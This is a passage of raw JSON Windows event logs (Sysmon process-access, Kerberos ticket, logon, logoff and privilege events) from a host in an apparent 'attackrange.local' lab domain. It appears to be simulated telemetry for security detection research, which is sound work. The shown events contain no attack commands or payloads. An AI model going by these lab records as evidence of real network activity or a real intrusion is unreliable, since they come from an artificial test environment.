(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.620","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D9D30800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.620\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D9D30800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.620","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D9D30800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.526\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.526","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220644,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x885AD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x885ad","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220645,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x89C18\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x89c18","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220646,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8A6A2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8a6a2","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:23.651\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:23.651","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220647,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220648,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8A3D81DF-CFB0-81F8-C989-59580F7C5854}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8A3D81DF-CFB0-81F8-C989-59580F7C5854}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220649,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8A3D81DF-CFB0-81F8-C989-59580F7C5854}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8A3D81DF-CFB0-81F8-C989-59580F7C5854}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220650,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x909F1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8A3D81DF-CFB0-81F8-C989-59580F7C5854}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x909f1","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8A3D81DF-CFB0-81F8-C989-59580F7C5854}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220651,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x909F1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x909f1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
